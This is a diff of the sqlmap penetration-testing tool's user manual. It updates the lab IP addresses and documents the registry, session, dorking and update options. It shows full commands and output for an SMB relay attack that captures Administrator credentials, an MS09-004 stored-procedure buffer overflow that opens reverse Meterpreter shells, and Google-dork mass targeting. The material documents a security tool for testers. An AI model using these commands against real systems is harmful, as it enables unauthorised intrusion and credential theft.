      This technique is detailed on the white paper
+
      This technique is detailed in the white paper
 Advanced SQL injection to operating system full control.
      
 
 
      Example on a Microsoft SQL Server 2005 Service Pack 0 running as
@@ -4737,7 +5120,7 @@ Windows Ruby interpreter.
      
 
      
 
      
 
      -$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ sudo python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
   --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
 
 [...]
@@ -4757,8 +5140,8 @@ send the NTLM session hash when connecting to a SMB service
 [3] Reverse TCP
 [4] Reverse TCP (No NX)
 > 1
-[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
-[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
+[hh:mm:16] [INFO] which is the local address? [172.16.213.161] 172.16.213.161
+[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
 [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
 [hh:mm:16] [INFO] which payload do you want to use?
 [1] Reflective Meterpreter (default)
@@ -4789,27 +5172,27 @@ send the NTLM session hash when connecting to a SMB service
        =[ 168 aux
 
 resource> use windows/smb/smb_relay
-resource> set SRVHOST 192.168.1.161
-SRVHOST => 192.168.1.161
+resource> set SRVHOST 172.16.213.161
+SRVHOST => 172.16.213.161
 resource> set SRVPORT 139
 SRVPORT => 139
 resource> set PAYLOAD windows/meterpreter/bind_tcp
 PAYLOAD => windows/meterpreter/bind_tcp
 resource> set LPORT 4907
 LPORT => 4907
-resource> set RHOST 192.168.1.131
-RHOST => 192.168.1.131
+resource> set RHOST 172.16.213.131
+RHOST => 172.16.213.131
 resource> exploit
 [*] Exploit running as background job.
 msf exploit(smb_relay) > 
 [*] Started bind handler
 [*] Server started.
-[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+[*] Received 172.16.213.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
 Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.1.131:3242 \
-[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+[*] Sending Access Denied to 172.16.213.131:3242 \
+[*] Received 172.16.213.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
 Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
 [*] AUTHENTICATED as W2K3DEV\Administrator...
 [*] Connecting to the ADMIN$ share...
 [*] Regenerating the payload...
@@ -4824,26 +5207,26 @@ Server 2003 3790 Service Pack 2 LM:
 [*] Removing the service...
 [*] Closing service handle...
 [*] Deleting \wELRmcmd.exe...
-[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
+[*] Sending Access Denied to 172.16.213.131:3242 W2K3DEV\Administrator
 [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+[*] Received 172.16.213.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
 Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.1.131:3244 \
-[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+[*] Sending Access Denied to 172.16.213.131:3244 \
+[*] Received 172.16.213.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
 Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
 [*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Ignoring request from 192.168.1.131, attack already in progress.
-[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
+[*] Ignoring request from 172.16.213.131, attack already in progress.
+[*] Sending Access Denied to 172.16.213.131:3244 W2K3DEV\Administrator
 [*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
+[*] Meterpreter session 1 opened (172.16.213.161:51813 -> 172.16.213.131:4907)
 
 Active sessions
 ===============
 
   Id  Description  Tunnel                                       
   --  -----------  ------                                       
-  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
+  1   Meterpreter  172.16.213.161:51813 -> 172.16.213.131:4907  
 
 msf exploit(smb_relay) > [*] Starting interaction with 1...
 
@@ -4861,69 +5244,61 @@ msf exploit(smb_relay) > exit
 
      
 
 
-
      Stored procedure buffer overflow exploitation
      
+
      Database stored procedure heap-based buffer overflow exploit
      
 
-
      Options: --os-bof, --priv-esc and --msf-path
      
+
      Options: --os-bof, --priv-esc and --msf-path
      
 
-
      If the back-end database management system is not patched against Microsoft
-Security Bulletin 
-MS09-004,
-sqlmap can exploit the heap-based buffer overflow affecting
-sp_replwritetovarbin stored procedure in order to establish an
-out-of-band TCP stateful channel between the attacker host and the
-target database server.
+
      If the back-end database management system is Microsoft SQL Server not
+patched against Microsoft Security Bulletin
+MS09-004, sqlmap can exploit the heap-based buffer overflow
+affecting sp_replwritetovarbin stored procedure in order to
+establish an out-of-band TCP stateful channel between the
+attacker host and the target database server.
 sqlmap has its own exploit to trigger the vulnerability, but it relies on
 Metasploit to
-generate the shellcode used within the exploit, so you need to have it
-already on your system: it's free and can be downloaded from the homepage.
      
+generate the shellcode used within the exploit.
      
 
 
      Note that this feature is not supported by sqlmap running on Windows
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
      
+platform because it relies on Metasploit's msfcli which is not
+available for Windows.
      
 
-
      This technique is detailed on the white paper
-Advanced SQL injection to operating system full control.
      
+
      This technique is detailed in the white paper
+Advanced SQL injection to operating system full control and in the
+slide deck 
+Expanding the control over the operating system from the database.
      
 
 
      Example on a Microsoft SQL Server 2005 Service Pack 0 target:
      
 
      
 
      
 
      -$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1 \
+  --os-bof -v 1 --msf-path ~/software/metasploit
 
 [...]
-[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
+[hh:mm:51] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
 stored procedure heap-based buffer overflow (MS09-004)
-[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
-[hh:mm:14] [INFO] retrieved: 1
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
-[hh:mm:15] [INFO] testing if current user is DBA
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
+[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack
+[hh:mm:56] [INFO] retrieved: 1
+[hh:mm:58] [INFO] retrieved: 1
+[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
+[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
 which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
 > 
-which is the back-end DBMS address? [192.168.1.131] 
-which remote port numer do you want to use? [39391] 62719
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [21380] 
 which payload do you want to use?
-[1] Reflective Meterpreter (default)
-[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
-[3] Shell
-[4] Reflective VNC
-[5] PatchUp VNC (only from Metasploit development revision 6742)
+[1] Meterpreter (default)
+[2] Shell
+[3] VNC
 > 
 which payload encoding do you want to use?
 [1] No Encoder
@@ -4940,217 +5315,122 @@ which payload encoding do you want to use?
 [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
 [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
 > 
-[hh:mm:50] [INFO] creation in progress .................. done
-[hh:mm:08] [INFO] handling DEP
-[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
-handle it
-[hh:mm:08] [INFO] checking DEP system policy
-[hh:mm:09] [INFO] retrieved: OPTIN
-[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
-[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
+[hh:mm:16] [INFO] creation in progress .... done
+[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Started bind handler
+[*] Started reverse handler on 172.16.213.1:21380 
 [*] Starting the payload handler...
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
+[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait..
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:21380 -> 172.16.213.128:12062)
 
+meterpreter > Loading extension espia...success.
+meterpreter > Loading extension incognito...success.
 meterpreter > Loading extension priv...success.
-meterpreter > getuid
-Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
+Netmask     : 255.255.255.0
+
+
 meterpreter > exit
 
      
 
      
 
      
 
 
-
      5.10 Miscellaneous
+
      5.11 Windows registry access
 
      
 
-
      Estimated time of arrival
      
+
      Read a Windows registry key value
      
 
-
      Option: --eta
      
+
      Option: --reg-read
      
 
-
      It is possible to calculate and show the estimated time of arrival to
-retrieve each query output in real time while performing the SQL injection
-attack.
      
-
-
      Example on an Oracle XE 10.2.0.1 target:
      
-
      
-
      
-
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b \
-  --eta -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:24] [INFO] fetching banner
-[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
-output again
-[hh:mm:24] [INFO] retrieved the length of query output: 64
-[hh:mm:24] [INFO] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
-WHERE ROWNUM=1
-77% [=======================================>            ] 49/64  ETA 00:00    
-
      
-
      
-
      
-
-
      then:
      
-
      
-
      
-
      -100% [====================================================] 64/64              
-[hh:mm:15] [INFO] performed 454 queries in 2 seconds
-banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
-
      
-
      
-
      
-
-
      Example on a Microsoft SQL Server 2000 Service Pack 0 target:
      
-
      
-
      
-
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" \
-  --users --eta -v 1
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:57] [INFO] fetching database users
-[hh:mm:57] [INFO] fetching number of database users
-[hh:mm:57] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), 
-(CHAR(32))) FROM master..syslogins
-[hh:mm:57] [INFO] retrieved: 3
-[hh:mm:57] [INFO] performed 13 queries in 0 seconds
-[hh:mm:57] [INFO] retrieved the length of query output: 22
-[hh:mm:57] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
-master..syslogins WHERE name NOT IN (SELECT TOP 0 name FROM master..syslogins ORDER BY name) 
-ORDER BY name
-100% [====================================================] 22/22              
-[hh:mm:58] [INFO] performed 160 queries in 0 seconds
-[hh:mm:58] [INFO] retrieved the length of query output: 2
-[hh:mm:58] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
-master..syslogins WHERE name NOT IN (SELECT TOP 1 name FROM master..syslogins ORDER BY name) 
-ORDER BY name
-100% [====================================================] 2/2                
-[hh:mm:59] [INFO] performed 20 queries in 0 seconds
-[hh:mm:59] [INFO] retrieved the length of query output: 25
-[hh:mm:59] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
-master..syslogins WHERE name NOT IN (SELECT TOP 2 name FROM master..syslogins ORDER BY name) 
-ORDER BY name
-100% [====================================================] 25/25              
-[hh:mm:00] [INFO] performed 181 queries in 1 seconds
-database management system users [3]:
-[*] BUILTIN\Administrators
-[*] sa
-[*] W2KITINQUIS\Administrator
-
      
-
      
-
      
-
-
      As you can see, sqlmap first calculates the length of the query output,
-then estimated the time of arrival, shows the progress in percentage and
-counts the number of retrieved query output characters.
      
+
      TODO
      
 
 
-
      Update sqlmap to the latest stable version
      
+
      Write a Windows registry key value data
      
 
-
      Option: --update
      
+
      Option: --reg-add
      
+
+
      TODO
      
 
 
-
      It is possible to update sqlmap to the latest stable version available on
-its 
-SourceForge File List page by running it with the
---update option.
      
-
      
-
      
-
      -$ python sqlmap.py --update -v 4
+
      Delete a Windows registry key value
      
 
-[hh:mm:53] [DEBUG] initializing the configuration
-[hh:mm:53] [DEBUG] initializing the knowledge base
-[hh:mm:53] [DEBUG] cleaning up configuration parameters
-[hh:mm:53] [DEBUG] setting the HTTP method to perform HTTP requests through
-[hh:mm:53] [DEBUG] creating HTTP requests opener object
-[hh:mm:53] [INFO] updating sqlmap
-[hh:mm:53] [DEBUG] checking if a new version is available
-[hh:mm:55] [TRAFFIC OUT] HTTP request:
-GET /doc/VERSION HTTP/1.1
-Host: sqlmap.sourceforge.net
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
-Connection: close
+
      Option: --reg-del
      
 
-[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 01 Aug 2008 14:50:55 GMT
-Server: Apache/1.3.33 (Unix) PHP/4.3.10
-Last-Modified: Thu, 31 Jul 2008 11:10:19 GMT
-ETag: "9fcc53e-4-48919d9b"
-Accept-Ranges: bytes
-Content-Length: 4
-Connection: close
-Content-Type: text/plain
-X-Pad: avoid browser bug
-
-[hh:mm:55] [INFO] you are already running sqlmap latest stable version
-[hh:mm:55] [INFO] updating Microsoft SQL Server XML versions file
-[hh:mm:56] [TRAFFIC OUT] HTTP request:
-GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1
-Host: www.sqlsecurity.com
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
-Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; 
-language=en-US
-Connection: close
-
-[hh:mm:02] [TRAFFIC IN] HTTP response (OK - 200):
-Cache-Control: private
-Connection: close
-Date: Fri, 01 Aug 2008 14:50:50 GMT
-Content-Length: 167918
-Content-Type: text/html; charset=utf-8
-Server: Microsoft-IIS/6.0
-X-Powered-By: ASP.NET
-X-AspNet-Version: 2.0.50727
-Set-Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; 
-expires=Fri, 10-Oct-2008 01:30:49 GMT; path=/; HttpOnly
-Set-Cookie: language=en-US; path=/; HttpOnly
-
-[hh:mm:02] [INFO] no new Microsoft SQL Server versions since the last update
-[hh:mm:02] [DEBUG] parsing XML queries file
-
      
-
      
-
      
-
-
      As you can see, sqlmap first check if a new stable version is available,
-then in case it is, download it, unzip it and update the Microsoft SQL
-Server XML versions file from Chip Andrews'
-SQLSecurity.com site.
      
-
-
      Note that the default configuration file sqlmap.conf is backupped
-to sqlmap.conf.bak in case a new stable version is available and
-your copy is updated.
      
+
      TODO
      
 
 
-
      Save and resume all data retrieved on a session file
      
+
      Windows registry key
      
+
+
      Option: --reg-key
      
+
+
      TODO
      
+
+
+
      Windows registry key value
      
+
+
      Option: --reg-value
      
+
+
      TODO
      
+
+
+
      Windows registry key value data
      
+
+
      Option: --reg-data
      
+
+
      TODO
      
+
+
+
      Windows registry key value type
      
+
+
      Option: --reg-type
      
+
+
      TODO
      
+
+
+
      5.12 Miscellaneous
+
      
+
+
      Session file: save and resume all data retrieved
      
 
 
      Option: -s
      
 
-
      It is possible to log all queries and their output on a text file while
+
      By default sqlmap logs all queries and their output into a text file while
 performing whatever request, both in blind SQL injection and in inband SQL
 injection.
 This is useful if you stop the injection and resume it after some time.
      
 
+
      The default session file is output/hostname/session, but you can
+change its path with the -s option.
      
+
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 1 -s "sqlmap.log"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
+  -v 2 -s "sqlmap.log"
 
 [...]
 back-end DBMS:  PostgreSQL
-[hh:mm:02] [INFO] query: VERSION()
+[hh:mm:02] [DEBUG] query: VERSION()
 [hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C
 [hh:mm:03] [ERROR] user aborted
 
      
@@ -5166,16 +5446,16 @@ retrieving the PostgreSQL banner and logged the session to text file
 $ cat sqlmap.log
 
 [hh:mm:00 MM/DD/YY]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL]
-[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL]
+[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 
 on i486-pc-
 
      
 
      
@@ -5201,8 +5481,8 @@ retrieved to the end of the query output.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 1 -s "sqlmap.log"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
+  -v 2 -s "sqlmap.log"
 
 [...]
 [hh:mm:03] [INFO] resuming injection point 'GET' from session file
@@ -5213,11 +5493,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
 [hh:mm:03] [INFO] testing connection to the target url
 [hh:mm:03] [INFO] testing for parenthesis on injectable parameter
 [hh:mm:03] [INFO] retrieving the length of query output
-[hh:mm:03] [INFO] query: LENGTH(VERSION())
+[hh:mm:03] [DEBUG] query: LENGTH(VERSION())
 [hh:mm:03] [INFO] retrieved: 98
 [hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-...
 [hh:mm:03] [INFO] retrieving pending 70 query output characters
-[hh:mm:03] [INFO] query: SUBSTR((VERSION())::text, 29, 98)
+[hh:mm:03] [DEBUG] query: SUBSTR((VERSION())::text, 29, 98)
 [hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real 
 (Ubuntu 4.3.2-1ubuntu11) 4.3.2
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
@@ -5233,9 +5513,164 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
 
      
 
 
-
      Save options on a configuration INI file
      
+
      Flush session file for current target
      
 
-
      Option: --save
      
+
      Option: --flush-session
      
+
+
      As you are already familiar with the concept of a session file from the
+description of option -s, it is good to know that you can flush
+the content of that same file using option --flush-session.
+This way you can avoid caching mechanisms implemented by default in
+sqlmap. Other possible way is the manual removing of session file(s),
+sqlmap.log in the example above, or the default
+output/hostname/session if -s is not provided.
      
+
+
+
      Estimated time of arrival
      
+
+
      Option: --eta
      
+
+
      It is possible to calculate and show the estimated time of arrival to
+retrieve each query output in real time while performing the SQL injection
+attack.
      
+
+
      Example on an Oracle XE 10.2.0.1 target:
      
+
      
+
      
+
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b \
+  --eta -v 2
+
+[...]
+back-end DBMS:  Oracle
+
+[hh:mm:24] [INFO] fetching banner
+[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
+output again
+[hh:mm:24] [INFO] retrieved the length of query output: 64
+[hh:mm:24] [DEBUG] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
+WHERE ROWNUM=1
+77% [=======================================>            ] 49/64  ETA 00:00    
+
      
+
      
+
      
+
+
      then:
      
+
      
+
      
+
      +100% [====================================================] 64/64              
+[hh:mm:15] [DEBUG] performed 454 queries in 2 seconds
+banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
+
      
+
      
+
      
+
+
      Example on a Microsoft SQL Server 2000 Service Pack 0 target:
      
+
      
+
      
+
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" \
+  --users --eta -v 1
+
+[...]
+back-end DBMS:  Microsoft SQL Server 2000
+
+[hh:mm:57] [INFO] fetching database users
+[hh:mm:57] [INFO] fetching number of database users
+[hh:mm:57] [INFO] retrieved: 3
+[hh:mm:57] [INFO] retrieved the length of query output: 22
+100% [====================================================] 22/22
+[hh:mm:58] [INFO] retrieved the length of query output: 2
+100% [====================================================] 2/2
+[hh:mm:59] [INFO] retrieved the length of query output: 25
+100% [====================================================] 25/25
+[hh:mm:00] [DEBUG] performed 181 queries in 1 seconds
+database management system users [3]:
+[*] BUILTIN\Administrators
+[*] sa
+[*] W2KITINQUIS\Administrator
+
      
+
      
+
      
+
+
      As you can see, sqlmap first calculates the length of the query output,
+then estimates the time of arrival, shows the progress in percentage and
+counts the number of retrieved query output characters.
      
+
+
+
      Use Google dork results from specified page number
      
+
+
      Option: --gpage
      
+
+
      Default sqlmap behavior with option -g is to do a Google
+search and use resulting urls from first (100) result page for further 
+sql injection testing. In combination with this option you can specify
+some other page other than the first one for retrieving target urls.
      
+
+
      Example of Google dorking with expression login ext:php 
+and resulting page set to 3:
      
+
      
+
      
+
      +$ python sqlmap.py -g "ext:php login" --gpage 3 -v 1
+
+[hh:mm:14] [INFO] first request to Google to get the session cookie
+[hh:mm:14] [INFO] using Google result page #3
+[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are 
+testable targets
+[hh:mm:15] [INFO] sqlmap got a total of 89 targets
+url 1:
+GET http://www.XXX.com/index.php?pageid=login
+do you want to test this url? [Y/n/q]
+> y
+[hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login
+[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file
+[hh:mm:17] [INFO] testing connection to the target url
+[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:19] [INFO] url is stable
+[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
+[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
+[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
+[...]
+
      
+
      
+
      
+
+
+
      Update sqlmap
      
+
+
      Option: --update
      
+
+
      Using this option you can update the program to the latest version
+directly from the Subversion repository along with the latest
+Microsoft SQL Server XML versions file from Chip Andrews'
+SQLSecurity.com site.
      
+
      
+
      
+
      +$ python sqlmap.py --update
+
+[...]
+[hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository
+[hh:mm:28] [INFO] updated to the latest revision XXXX
+[hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file
+[hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update
+[...]
+
      
+
      
+
      
+
+
      The Debian and Red Hat installation packages (deb and rpm) as well as the
+Windows binary package (exe) can not be used to update sqlmap. You need
+a source package (gzip, bzip2 or zip) to use this feature.
      
+
+
+
      Save options in a configuration INI file
      
+
+
      Option: --save
      
 
 
      It is possible to save the command line options to a configuration INI
 file.
      
@@ -5244,10 +5679,10 @@ file.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
   -v 1 --save
 
-[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-SAUbs.conf' 
+[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' 
 configuration file
 [hh:mm:33] [INFO] testing connection to the target url
 [hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
@@ -5263,12 +5698,31 @@ INI file, sqlmap-SAUbs.conf.
      
 
       $ cat sqlmap-SAUbs.conf
 [Target]
-url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
+url = http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1
 googledork = 
+configfile = 
 list = 
+requestfile = 
+
+[Windows]
+regread = False
+regval = 
+regdata = 
+regadd = False
+regdel = False
+regtype = 
+regkey = 
+
+[User-defined function]
+shlib = 
+udfinject = False
 
 [Request]
+cookieurlencode = False
+ignoreproxy = False
 threads = 1
+acert = 
+retries = 3
 useragentsfile = 
 atype = 
 agent = 
@@ -5277,8 +5731,10 @@ headers =
 cookie = 
 proxy = 
 timeout = 30
+scope = 
 acred = 
 referer = 
+dropsetcookie = False
 data = 
 method = GET
 
@@ -5287,31 +5743,35 @@ updateall = False
 sessionfile = 
 eta = False
 batch = False
+flushsession = False
 cleanup = False
+googlepage = 0
 verbose = 1
 
 [Enumeration]
-dumpall = False
 limitstop = 0
-getusers = False
-isdba = False
 getpasswordhashes = False
 excludesysdbs = False
 getcurrentdb = False
+getcurrentuser = False
+limitstart = 0
+query = 
+getusers = False
+isdba = False
 gettables = False
 dumptable = False
+getdbs = False
 db = 
-limitstart = 0
-getprivileges = False
 sqlshell = False
 tbl = 
+firstchar = 0
 getcolumns = False
-query = 
-getdbs = False
-user = 
-col = 
-getcurrentuser = False
 getbanner = True
+dumpall = False
+getprivileges = False
+lastchar = 0
+col = 
+user = 
 
 [File system]
 dfile = 
@@ -5343,26 +5803,25 @@ eregexp =
 os = 
 
 [Techniques]
-stackedtest = False
 utech = 
 unionuse = False
 timetest = False
 uniontest = False
+stackedtest = False
+timesec = 5
 
      
 
      
 
      
 
 
      The file is a valid sqlmap configuration INI file.
 You can edit the configuration options as you wish and pass it to sqlmap
